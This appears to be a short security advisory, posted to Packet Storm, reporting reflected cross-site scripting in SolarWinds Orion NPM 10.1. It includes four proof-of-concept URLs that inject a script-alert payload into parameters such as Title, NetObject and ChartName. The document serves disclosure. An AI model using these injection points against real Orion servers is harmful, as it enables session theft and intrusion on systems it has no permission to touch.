Solarwinds Orion NPM version 10.1 suffers from a cross site scripting vulnerability.
657dc482752d0c77132eaea76eb28dc4bc2621018713acc9d138fd6d6771bb89Values placed in the URI of the browser are rendered correctly. Orion NPM
10.1 has just been released, so there is no known fix available as of yet.
Examples:
Most "variable=" that I've checked are vulnerable:
https://<server>/Orion/NetPerfMon/MapView.aspx?Map=4f89095c-35fa-4b1b-813f-231270=0225b7.OrionMap&Title=%3Cscript%3Ealert%28%27test%27%29%3C/script%3E
https://<server>/Orion/NetPerfMon/NodeDetails.aspx?NetObject=%3Cscript%3Ealert%28=%27test%27%29%3C/script%3E
https://<server>/Orion/NPM/InterfaceDetails.aspx?NetObject=%3Cscript%3Ealert%28%2=7test%27%29%3C/script%3E&I:100&view=InterfaceDetails
https://<server>/Orion/NetPerfMon/CustomChart.aspx?ChartName=%3Cscript%3Ealert%28=%27test%27%29%3C/script%3E&Title=&SubTitle=&SubTitle2=&Width=0&Height=0&NetObject=I:100&CustomPollerID=&Rows=&SampleSize=1M&Period=Yesterday&PlotStyle=&FontSize=1&NetObjectPrefix=I&SubsetColor=&R=YSubsetColor=&ResourceID=57&ShowTrend=True&ReturnTo=
If you need more information please let me know. Is there a template I
should fill out for these reports?
If this is published, please publish under x0skel and NOT my name....
Thanks,
John
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed